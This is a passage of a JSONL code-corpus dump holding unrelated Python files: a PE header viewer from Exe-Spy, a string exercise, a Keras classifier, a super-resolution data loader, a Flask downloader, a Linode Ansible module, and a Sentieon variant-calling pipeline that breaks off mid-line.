self.scroll_area.layout().addWidget(self.optional_header_group)\n self.dos_header_group.setFocus()\n\n def load(self, pe_obj: pe_file.PEFile):\n\n # DOS Header\n self.dos_header_group.view.setModel(\n table.TableModel(\n [\n (\"e_magic\", \"Magic number\", hex(pe_obj.pe.DOS_HEADER.e_magic)),\n (\n \"e_cblp\",\n \"Bytes on last page of file\",\n hex(pe_obj.pe.DOS_HEADER.e_cblp),\n ),\n (\"e_cp\", \"Pages in file\", hex(pe_obj.pe.DOS_HEADER.e_cp)),\n (\"e_crlc\", \"Relocations\", hex(pe_obj.pe.DOS_HEADER.e_crlc)),\n (\n \"e_cparhdr\",\n \"Size of header in paragraphs\",\n hex(pe_obj.pe.DOS_HEADER.e_cparhdr),\n ),\n (\n \"e_minalloc\",\n \"Minimum extra paragraphs needed\",\n hex(pe_obj.pe.DOS_HEADER.e_minalloc),\n ),\n (\n \"e_maxalloc\",\n \"Maximum extra paragraphs needed\",\n hex(pe_obj.pe.DOS_HEADER.e_maxalloc),\n ),\n (\n \"e_ss\",\n \"Initial (relative) SS value\",\n hex(pe_obj.pe.DOS_HEADER.e_ss),\n ),\n (\"e_sp\", \"Initial SP value\", hex(pe_obj.pe.DOS_HEADER.e_sp)),\n (\"e_csum\", \"Checksum\", hex(pe_obj.pe.DOS_HEADER.e_csum)),\n (\"e_ip\", \"Initial IP value\", hex(pe_obj.pe.DOS_HEADER.e_ip)),\n (\n \"e_cs\",\n \"Initial (relative) CS value\",\n hex(pe_obj.pe.DOS_HEADER.e_cs),\n ),\n (\n \"e_lfarlc\",\n \"File address of relocation table\",\n hex(pe_obj.pe.DOS_HEADER.e_lfarlc),\n ),\n (\"e_ovno\", \"Overlay number\", hex(pe_obj.pe.DOS_HEADER.e_ovno)),\n (\n \"e_res\",\n \"Reserved words\",\n hex(int.from_bytes(pe_obj.pe.DOS_HEADER.e_res, \"big\")),\n ),\n (\n \"e_oemid\",\n \"OEM identifier (for e_oeminfo)\",\n hex(pe_obj.pe.DOS_HEADER.e_oemid),\n ),\n (\n \"e_oeminfo\",\n \"OEM information; e_oemid specific\",\n hex(pe_obj.pe.DOS_HEADER.e_oeminfo),\n ),\n (\n \"e_res2\",\n \"Reserved words\",\n hex(int.from_bytes(pe_obj.pe.DOS_HEADER.e_res2, \"big\")),\n ),\n (\n \"e_lfanew\",\n \"File address of new exe header\",\n hex(pe_obj.pe.DOS_HEADER.e_lfanew),\n ),\n ],\n headers=[\"Name\", \"Description\", \"Value\"],\n )\n )\n\n # COFF File Header\n self.file_header_group.view.setModel(\n table.TableModel(\n [\n (\n \"Machine\",\n f\"{hex(pe_obj.pe.FILE_HEADER.Machine)} ({pe_obj.architecture()})\",\n ),\n (\"NumberOfSections\", str(pe_obj.pe.FILE_HEADER.NumberOfSections)),\n (\n \"TimeDateStamp\",\n f\"{hex(pe_obj.pe.FILE_HEADER.TimeDateStamp)} ({helpers.format_time(pe_obj.pe.FILE_HEADER.TimeDateStamp)})\",\n ),\n (\n \"PointerToSymbolTable\",\n hex(pe_obj.pe.FILE_HEADER.PointerToSymbolTable),\n ),\n (\"NumberOfSymbols\", str(pe_obj.pe.FILE_HEADER.NumberOfSymbols)),\n (\n \"SizeOfOptionalHeader\",\n hex(pe_obj.pe.FILE_HEADER.SizeOfOptionalHeader),\n ),\n (\n \"Characteristics\",\n f\"{hex(pe_obj.pe.FILE_HEADER.Characteristics)} ({pe_obj.characteristics_str()})\",\n ),\n ],\n headers=[\"Name\", \"Value\"],\n )\n )\n\n # Optional Header\n base_of_data = []\n try:\n base_of_data.append(\n (\"BaseOfData\", hex(pe_obj.pe.OPTIONAL_HEADER.BaseOfData))\n )\n except AttributeError:\n pass\n\n self.optional_header_group.view.setModel(\n table.TableModel(\n [\n (\n \"Magic\",\n f\"{hex(pe_obj.pe.OPTIONAL_HEADER.Magic)} ({pe_obj.pe_format()})\",\n ),\n (\n \"MajorLinkerVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MajorLinkerVersion),\n ),\n (\n \"MinorLinkerVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MinorLinkerVersion),\n ),\n (\"SizeOfCode\", hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfCode)),\n (\n \"SizeOfInitializedData\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfInitializedData),\n ),\n (\n \"SizeOfUninitializedData\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfUninitializedData),\n ),\n (\n \"AddressOfEntryPoint\",\n hex(pe_obj.pe.OPTIONAL_HEADER.AddressOfEntryPoint),\n ),\n (\"BaseOfCode\", hex(pe_obj.pe.OPTIONAL_HEADER.BaseOfCode)),\n ]\n + base_of_data\n + [\n (\"ImageBase\", hex(pe_obj.pe.OPTIONAL_HEADER.ImageBase)),\n (\n \"SectionAlignment\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SectionAlignment),\n ),\n (\"FileAlignment\", hex(pe_obj.pe.OPTIONAL_HEADER.FileAlignment)),\n (\n \"MajorOperatingSystemVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MajorOperatingSystemVersion),\n ),\n (\n \"MinorOperatingSystemVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MinorOperatingSystemVersion),\n ),\n (\n \"MajorImageVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MajorImageVersion),\n ),\n (\n \"MinorImageVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MinorImageVersion),\n ),\n (\n \"MajorSubsystemVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MajorSubsystemVersion),\n ),\n (\n \"MinorSubsystemVersion\",\n str(pe_obj.pe.OPTIONAL_HEADER.MinorSubsystemVersion),\n ),\n (\n \"Win32VersionValue (reserved)\",\n hex(pe_obj.pe.OPTIONAL_HEADER.Reserved1),\n ),\n (\"SizeOfImage\", hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfImage)),\n (\"SizeOfHeaders\", hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfHeaders)),\n (\n \"CheckSum\",\n hex(pe_obj.pe.OPTIONAL_HEADER.CheckSum),\n ),\n (\n \"Subsystem\",\n f\"{hex(pe_obj.pe.OPTIONAL_HEADER.Subsystem)} ({pe_obj.subsystem()})\",\n ),\n (\n \"DllCharacteristics\",\n f\"{hex(pe_obj.pe.OPTIONAL_HEADER.DllCharacteristics)}, ({pe_obj.dll_characteristics_str()})\",\n ),\n (\n \"SizeOfStackReserve\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfStackReserve),\n ),\n (\n \"SizeOfStackCommit\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfStackCommit),\n ),\n (\n \"SizeOfHeapReserve\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfHeapReserve),\n ),\n (\n \"SizeOfHeapCommit\",\n hex(pe_obj.pe.OPTIONAL_HEADER.SizeOfHeapCommit),\n ),\n (\"LoaderFlags\", hex(pe_obj.pe.OPTIONAL_HEADER.LoaderFlags)),\n (\n \"NumberOfRvaAndSizes\",\n str(pe_obj.pe.OPTIONAL_HEADER.NumberOfRvaAndSizes),\n ),\n ],\n headers=[\"Name\", \"Value\"],\n )\n )\n","repo_name":"andyjsmith/Exe-Spy","sub_path":"exespy/views/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":10525,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"53"} +{"seq_id":"45143941778","text":"def solution(s):\n s = list(s)\n a = len(s)//2\n #짝수일때\n if len(s)%2==0:\n return ''.join(s[a-1:a+1])\n #홀수일때\n else:\n return s.pop(a)\n return 0\nsolution(\"we\")\n\n\n\"\"\"\n해결방안\n 1. 입력값 문자열의 길이를 반으로 나눈다.\n 2. 나눈 값이 짝,홀로 나뉨\n 2-1 홀일떄 pop 으로 가져온다\n 2-2 짝일때 ''.join(s[몫-1 : 몫+1])\n\n다른사람코드\n def string_middle(str):\n return str[(len(str)-1)//2 : len(str)//2 + 1]\n\n\n분석 및 느낀점\n 변수를 쓰지도 않고.. 깔끔한거같다\n\"\"\"\n\n","repo_name":"comjayoncloud/study-python","sub_path":"CodingTest/프로그래머스/코딩테스트 - 레벨1/가운데 글자 가져오기.py","file_name":"가운데 글자 가져오기.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1725951013","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.models import model_from_json\n\ndf = pd.read_csv(r'/kaggle/input/innerve-ads/ADScry.csv')\nX = df.iloc[:, 0:19].values\ny = df.iloc[:, 20]\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, random_state=0)\n\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\nclassifier = Sequential()\nclassifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=19))\nclassifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\nclassifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\nclassifier.fit(X_train, y_train, batch_size=10, epochs=100)\n\ny_pred = classifier.predict(X_test)\n\ny_p = []\n\nfor index, item in enumerate(y_pred):\n if item >= 0.5:\n y_p.append(1)\n else:\n y_p.append(0)\n\ny_t=y_test.tolist()\n\ncount = 0\nfor i in range(634):\n if y_p[i] == y_t[i]:\n count = count+1\n\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_t, y_p)\nprint(cm)","repo_name":"grlwholifts/early-autism-detection","sub_path":"Training.py","file_name":"Training.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17243635650","text":"from fileinput import filename\nimport cv2\nfrom torch.utils import data\nimport os\nimport imageio\nimport matplotlib.pyplot as plt\nclass TrainDataset(data.Dataset):\n def __init__(self,cfg,transforms):\n super(TrainDataset,self).__init__()\n self.cfg=cfg\n train_path=cfg.train_data_dir\n hr_path=os.path.join(train_path,\"HR\")\n lr_path=os.path.join(train_path,\"LR_bicubic_X\"+cfg.scale)\n self.hr=[]\n self.lr=[]\n self.filename=[]\n lr_list=os.listdir(lr_path)\n for file in os.listdir(hr_path):\n filename,tail=os.path.splitext(file)\n lr_filename=filename+\"x\"+cfg.scale+tail\n if lr_filename in lr_list:\n self.hr.append(os.path.join(hr_path,file))\n self.lr.append(os.path.join(lr_path,lr_filename))\n self.filename.append(filename)\n tmp_hr=self.hr[:]\n tmp_lr=self.lr[:]\n tmp_filename=self.filename[:]\n for _ in range(cfg.repeat-1):\n self.hr+=tmp_hr\n for _ in range(cfg.repeat-1):\n self.lr+=tmp_lr\n for _ in range(cfg.repeat-1):\n self.filename+=tmp_filename\n self.transform=transforms\n def __getitem__(self, index):\n hr_file_path=self.hr[index]\n hr_file_path=hr_file_path.replace(\"\\\\\",'/')\n lr_file_path=self.lr[index]\n lr_file_path=lr_file_path.replace(\"\\\\\",'/')\n filename=self.filename[index]\n hr = imageio.imread(hr_file_path)\n lr = imageio.imread(lr_file_path)\n if self.transform:\n lr,hr=self.transform.data_transform[\"train\"](lr,hr)\n return lr,hr,filename\n def __len__(self):\n return len(self.hr)\nclass ValidDataset(data.Dataset):\n def __init__(self,cfg,transforms):\n super(ValidDataset,self).__init__()\n val_path=os.path.join(cfg.val_data_dir,\"image_SRF_\"+cfg.scale)\n self.hr=[]\n self.lr=[]\n self.filename=[]\n img_tail=\".png\"\n file_list=os.listdir(val_path)\n for file in file_list:\n tmp_sign=\"_SRF_\"+cfg.scale+\"_\"\n filename,tail=file.split(tmp_sign)\n hr_filename=filename+tmp_sign+\"HR\"+img_tail\n lr_filename=filename+tmp_sign+\"LR\"+img_tail\n if lr_filename in file_list and hr_filename in file_list:\n self.hr.append(os.path.join(val_path,hr_filename))\n self.lr.append(os.path.join(val_path,lr_filename))\n self.filename.append(filename)\n self.transform=transforms\n def __getitem__(self, index):\n hr_file_path=self.hr[index]\n hr_file_path=hr_file_path.replace(\"\\\\\",'/')\n lr_file_path=self.lr[index]\n lr_file_path=lr_file_path.replace(\"\\\\\",'/')\n filename=self.filename[index]\n hr = imageio.imread(hr_file_path)\n lr = imageio.imread(lr_file_path)\n # hr = imageio.imread(hr_file_path).convert(\"RGB\")\n # lr = imageio.imread(lr_file_path).convert(\"RGB\")\n if self.transform:\n lr,hr=self.transform.data_transform[\"val\"](lr,hr)\n return lr,hr,filename\n def __len__(self):\n return len(self.hr)\nclass TestDataset(data.Dataset):\n def __init__(self,cfg,transforms):\n super(TestDataset,self).__init__()\n lr_test_path=os.path.join(cfg.test_data_dir,\"LRbicx\"+cfg.scale)\n hr_test_path=os.path.join(cfg.test_data_dir,\"original\")\n self.hr=[]\n self.lr=[]\n self.filename=[]\n img_tail=\".png\"\n lr_file_list=os.listdir(lr_test_path)\n hr_file_list=os.listdir(hr_test_path)\n for file in hr_file_list:\n filename=os.path.basename(file)\n if filename in lr_file_list and filename in hr_file_list:\n self.hr.append(os.path.join(hr_test_path,filename))\n self.lr.append(os.path.join(lr_test_path,filename))\n self.filename.append(filename)\n self.transform=transforms\n def __getitem__(self, index):\n hr_file_path=self.hr[index]\n hr_file_path=hr_file_path.replace(\"\\\\\",'/')\n lr_file_path=self.lr[index]\n lr_file_path=lr_file_path.replace(\"\\\\\",'/')\n filename=self.filename[index]\n hr = imageio.imread(hr_file_path)\n lr = imageio.imread(lr_file_path)\n if self.transform:\n lr,hr=self.transform.data_transform[\"test\"](lr,hr)\n return lr,hr,filename\n def __len__(self):\n return len(self.hr)","repo_name":"mohenghui/ERBPSR","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30167732581","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom package.ytdownloader import download\n\napp = Flask(__name__, static_folder='./static')\n\n@app.route('/')\ndef index():\n result = request.args.get('result')\n return render_template('index.html', result = result)\n\n@app.route('/submit', methods=['POST'])\ndef post_submit():\n result = ''\n for i in range(0,2):\n if request.form.get('url{}'.format(i)) != '':\n result = result + download(request.form.get('url{}'.format(i))) + '|'\n print(result)\n\n return redirect(url_for('index', result = result))\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"yuanlin/PythonLearning","sub_path":"Unit08/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73719268967","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"This module allows users to retrieve information about a Linode user.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom typing import Any, List, Optional\n\nimport ansible_collections.linode.cloud.plugins.module_utils.doc_fragments.user_info as docs\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_common import (\n LinodeModuleBase,\n)\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_docs import (\n global_authors,\n global_requirements,\n)\nfrom ansible_specdoc.objects import (\n FieldType,\n SpecDocMeta,\n SpecField,\n SpecReturnValue,\n)\nfrom linode_api4 import User\n\nspec = {\n # Disable the default values\n \"label\": SpecField(type=FieldType.string, required=False, doc_hide=True),\n \"state\": SpecField(type=FieldType.string, required=False, doc_hide=True),\n \"username\": SpecField(\n type=FieldType.string,\n required=True,\n description=[\"The username of the user.\"],\n ),\n}\n\nSPECDOC_META = SpecDocMeta(\n description=[\"Get info about a Linode User.\"],\n requirements=global_requirements,\n author=global_authors,\n options=spec,\n examples=docs.specdoc_examples,\n return_values={\n \"user\": SpecReturnValue(\n description=\"The user info in JSON serialized form.\",\n docs_url=\"https://www.linode.com/docs/api/account/#user-view\",\n type=FieldType.dict,\n sample=docs.result_user_samples,\n ),\n \"grants\": SpecReturnValue(\n description=\"The grants info in JSON serialized form.\",\n docs_url=\"https://www.linode.com/docs/api/account/#users-grants-view__response-samples\",\n type=FieldType.dict,\n sample=docs.result_grants_samples,\n ),\n },\n)\n\n\nclass Module(LinodeModuleBase):\n \"\"\"Module for getting info about a Linode user\"\"\"\n\n def __init__(self) -> None:\n self.required_one_of: List[str] = []\n self.results = {\"user\": None}\n\n self.module_arg_spec = SPECDOC_META.ansible_spec\n\n super().__init__(\n module_arg_spec=self.module_arg_spec,\n required_one_of=self.required_one_of,\n )\n\n def exec_module(self, **kwargs: Any) -> Optional[dict]:\n \"\"\"Entrypoint for user info module\"\"\"\n\n user = self.client.account.users(\n User.username == self.module.params.get(\"username\")\n )\n grants = user.grants\n\n self.results[\"user\"] = user._raw_json\n self.results[\"grants\"] = grants._raw_json\n\n return self.results\n\n\ndef main() -> None:\n \"\"\"Constructs and calls the module\"\"\"\n Module()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"linode/ansible_linode","sub_path":"plugins/modules/user_info.py","file_name":"user_info.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"22560143575","text":"import os\nscript_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nimport sys; sys.path.append(script_path)\nfrom basefly.basefly import Argument, Output, Command, Workflow, TopVar, TmpVar\nfrom utils.get_fastq_info import get_fastq_info\n__author__ = 'gdq'\n\n\"\"\"\n参考:https://github.com/Sentieon/sentieon-scripts/blob/master/example_pipelines/somatic/TNseq/tumor_normal.sh\n参考:https://support.sentieon.com/manual/TNseq_usage/tnseq/#\n本版本不刻意考虑是否可以正常生成wdl\n\"\"\"\n\n\ndef fastp(sample):\n cmd = Command()\n cmd.meta.name = 'fastp'\n # cmd.runtime.image = 'gudeqing/fastp:0.21.0'\n cmd.runtime.image = 'gudeqing/rnaseq_envs:1.0'\n cmd.runtime.tool = 'fastp'\n # 可以直接用访问属性的方式添加参数,这个得益于使用Munch对象而不是原生字典\n cmd.args['read1'] = Argument(prefix='-i ', type='infile', desc='read1 fastq file')\n cmd.args['read2'] = Argument(prefix='-I ', type='infile', desc='read2 fastq file')\n cmd.args['threads'] = Argument(prefix='-w ', default=7, desc='thread number')\n cmd.args['other_args'] = Argument(prefix='', default='', desc=\"other arguments you want to use, such as '-x val'\")\n # 当然,可以直接用字典的方式添加参数\n cmd.args['out1'] = Argument(prefix='-o ', value=TmpVar(value=f'{sample}.clean.R1.fq.gz', name='~{sample}.clean.R1.fq.gz'), type='str', desc='clean read1 output fastq file')\n cmd.args['out2'] = Argument(prefix='-O ', value=TmpVar(value=f'{sample}.clean.R2.fq.gz', name='~{sample}.clean.R2.fq.gz'), type='str', desc='clean read2 output fastq file')\n cmd.args['html'] = Argument(prefix='-h ', value=TmpVar(value=f'{sample}.fastp.html', name='~{sample}.fastp.html'), type='str', desc='html report file')\n cmd.args['json'] = Argument(prefix='-j ', value=TmpVar(value=f'{sample}.fastp.json', name='~{sample}.fastp.json') , type='str', desc='html report file')\n # 下面的outputs设置起初是为了能够生成wdl设置,\n cmd.outputs['out1'] = Output(value=\"{out1}\", type='outfile') # 这里使用”{}“引用其他Argument对象作为输入\n cmd.outputs['out2'] = Output(value=\"{out2}\")\n cmd.outputs['html'] = Output(value=\"{html}\")\n cmd.outputs['json'] = Output(value=\"{json}\")\n return cmd\n\n\ndef bwa_mem(sample, platform):\n cmd = Command()\n cmd.meta.name = 'bwa_mem'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon bwa mem -M'\n cmd.args['readgroup'] = Argument(prefix='-R ', desc='read group info', value=f'\"@RG\\\\tID:{sample}\\\\tSM:{sample}\\\\tPL:{platform}\"')\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['k'] = Argument(prefix='-K ', default=10000000)\n cmd.args['ref'] = Argument(type='infile', desc='reference fasta file')\n cmd.args['read1'] = Argument(type='infile', desc='read1 fastq file')\n cmd.args['read2'] = Argument(type='infile', desc='read2 fastq file')\n cmd.args['_x2'] = Argument(type='fix', value=' | sentieon util sort')\n cmd.args['ref2'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['out'] = Argument(prefix='-o ', desc='output bam file', value=f'{sample}.sorted.bam')\n cmd.args['t2'] = Argument(prefix='-t ', default=16, desc='number of threads to use')\n cmd.args['_x3'] = Argument(type='fix', value='--sam2bam -i -')\n cmd.outputs['out'] = Output(value=\"{out}\", type='outfile')\n return cmd\n\n\ndef get_metrics(sample):\n cmd = Command()\n cmd.meta.name = 'get_metrics'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['intervals'] = Argument(prefix='--interval ', level='optional', type='infile', multi_times=True, desc=\"interval file, support bed file or picard interval or vcf format\")\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args['mq_metrics'] = Argument(prefix='--algo MeanQualityByCycle ', value=f'{sample}.mq_metrics.txt', desc='metric file of MeanQualityByCycle')\n cmd.args['qd_metrics'] = Argument(prefix='--algo QualDistribution ', value=f'{sample}.qd_metrics.txt', desc='metric file of QualDistribution')\n cmd.args['gc_summary'] = Argument(prefix='--algo GCBias --summary ', value=f'{sample}.gc_summary.txt', desc='summary file of GCBias')\n cmd.args['gc_metrics'] = Argument(desc='metrics file of GCBias', value=f'{sample}.gc_metrics.txt')\n cmd.args['aln_metrics'] = Argument(prefix='--algo AlignmentStat ', value=f'{sample}.aln_metrics.txt', desc='aln_metrics file of AlignmentStat')\n cmd.args['insert_metrics'] = Argument(prefix='--algo InsertSizeMetricAlgo ', value=f'{sample}.insert_metrics.txt', desc='insert_metrics file of InsertSizeMetricAlgo')\n cmd.outputs['mq_metrics'] = Output(value='{mq_metrics}')\n cmd.outputs['qd_metrics'] = Output(value='{qd_metrics}')\n cmd.outputs['gc_summary'] = Output(value='{gc_summary}')\n cmd.outputs['gc_metrics'] = Output(value='{gc_metrics}')\n cmd.outputs['aln_metrics'] = Output(value='{aln_metrics}')\n cmd.outputs['insert_metrics'] = Output(value='{insert_metrics}')\n return cmd\n\n\ndef plot_metrics(sample, method='GCBias'):\n cmd = Command()\n cmd.meta.name = f'plot{method}'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon plot'\n cmd.args['method'] = Argument(desc='method of plot', default=method)\n cmd.args['out'] = Argument(prefix='-o ', desc='plot file', value=f'{sample}.{method}.pdf')\n cmd.args['i'] = Argument(type='infile', desc='input metrics file for plot')\n cmd.outputs['out'] = Output(value='{out}')\n return cmd\n\n\ndef locus_collector(sample):\n cmd = Command()\n cmd.meta.name = 'LocusCollector'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args['score'] = Argument(prefix='--algo LocusCollector --fun score_info ', desc='output score file', value=f'{sample}.score.txt')\n cmd.outputs['score'] = Output(value='{score}')\n return cmd\n\n\ndef dedup(sample):\n cmd = Command()\n cmd.meta.name = 'DeDup'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args['_x'] = Argument(type='fix', value='--algo Dedup')\n cmd.args['score'] = Argument(prefix='--score_info ', type='infile', desc='score info file')\n cmd.args['dedup_metrics'] = Argument(prefix='--metrics ', desc='output metrics info file', value=f'{sample}.dedup.metrics.txt')\n cmd.args['deduped_bam'] = Argument(desc='output metrics info file', value=f'{sample}.deduped.bam')\n cmd.outputs['dedup_metrics'] = Output(value='{dedup_metrics}')\n cmd.outputs['out_bam'] = Output(value='{deduped_bam}')\n return cmd\n\n\ndef coverage_metrics(sample):\n cmd = Command()\n cmd.meta.name = 'CoverageMetrics'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['intervals'] = Argument(prefix='--interval ', level='optional', type='infile', multi_times=True, desc=\"interval file, support bed file or picard interval or vcf format\")\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args['coverage_metrics'] = Argument(prefix='--algo CoverageMetrics ', value=f'{sample}.cov.metrics.txt', desc='output coverage metrics file')\n cmd.outputs['coverage_metrics'] = Output(value=\"{coverage_metrics}\")\n return cmd\n\n\ndef realign(sample):\n cmd = Command()\n cmd.meta.name = 'realign'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args._x = Argument(type='fix', value='--algo Realigner')\n cmd.args['database'] = Argument(prefix='-k ', type='infile', multi_times=True, desc='known indel vcf file')\n cmd.args['realigned_bam'] = Argument(desc='output realigned bam file', value=f'{sample}.realigned.bam')\n cmd.outputs['out_bam'] = Output(value='{realigned_bam}')\n return cmd\n\n\ndef recalibration(sample):\n cmd = Command()\n cmd.meta.name = 'recalibration'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['intervals'] = Argument(prefix='--interval ', level='optional', type='infile', multi_times=True, desc=\"interval file, support bed file or picard interval or vcf format\")\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n cmd.args['bam'] = Argument(prefix='-i ', type='infile', desc='input bam file')\n cmd.args['_x'] = Argument(type='fix', value='--algo QualCal')\n cmd.args['database'] = Argument(prefix='-k ', type='infile', multi_times=True, desc='known indel vcf file')\n cmd.args['recal_data'] = Argument(desc=\"output recal_data.table\", value=f'{sample}.recal_data.table')\n cmd.outputs['recal_data'] = Output(value='{recal_data}')\n return cmd\n\n\ndef TNhaplotyper2(tumor_sample):\n cmd = Command()\n cmd.meta.name = 'TNhaplotyper2'\n cmd.runtime.image = 'docker-reg.basebit.me:5000/pipelines/sentieon-joint-call:2019.11'\n cmd.runtime.tool = 'sentieon driver'\n cmd.args['t'] = Argument(prefix='-t ', default=16, desc='number of threads to use in computation, set to number of cores in the server')\n cmd.args['intervals'] = Argument(prefix='--interval ', level='optional', type='infile', multi_times=True, desc=\"interval file, support bed file or picard interval or vcf format\")\n cmd.args['ref'] = Argument(prefix='-r ', type='infile', desc='reference fasta file')\n # basic inputs\n cmd.args['bams'] = Argument(prefix='-i ', type='infile', multi_times=True, desc='reccaled tumor and normal bam list')\n cmd.args['recal_datas'] = Argument(prefix='-q ', type='infile', multi_times=True, desc='tumor and normal recal data list')\n cmd.args['method'] = Argument(prefix='--algo ', value='TNhaplotyper2', type='fix')\n cmd.args['tumor_sample'] = Argument(prefix='--tumor_sample ', desc='tumor sample name', default=tumor_sample)\n cmd.args['normal_sample'] = Argument(prefix='--normal_sample ', desc='normal sample name', level='optional')\n # optional inputs\n cmd.args['germline_vcf'] = Argument(prefix='--germline_vcf ', type='infile', level='optional', desc='the location of the population germline resource')\n cmd.args['pon'] = Argument(prefix='--pon ', type='infile', level='optional', desc='the location and name of panel of normal VCF file')\n cmd.args['out_vcf'] = Argument(value=f'{tumor_sample}.TNhaplotyper2.vcf.gz', desc='output vcf file of TNhaplotyper2, this will be used later for filtering')\n # orientation\n cmd.args['orientation_sample'] = Argument(prefix='--algo OrientationBias --tumor_sample ', level='optional', desc='tumor sample name')\n cmd.args['orientation_data'] = Argument(level='optional', default=f'{tumor_sample}.orientation.data', desc='output orientation bias result file')\n # contamination, 如果无对照样本或者germline vcf,则无该项分析\n cmd.args['contamination_tumor'] = Argument(prefix=\"--algo ContaminationModel --tumor_sample \", level='optional', desc='tumor sample name', default=tumor_sample)\n cmd.args['contamination_normal'] = Argument(prefix=\"--normal_sample \", level='optional', desc='normal sample name')\n cmd.args['germline_vcf2'] = Argument(prefix='--vcf ', type='infile', level='optional', desc='the location of the population germline resource')\n cmd.args['tumor_segments'] = Argument(prefix='--tumor_segments ', level='optional', default=f'{tumor_sample}.contamination.segments', desc='output file name of the file containing the tumor segments information produced by ContaminationModel')\n cmd.args['contamination_data'] = Argument(level='optional', 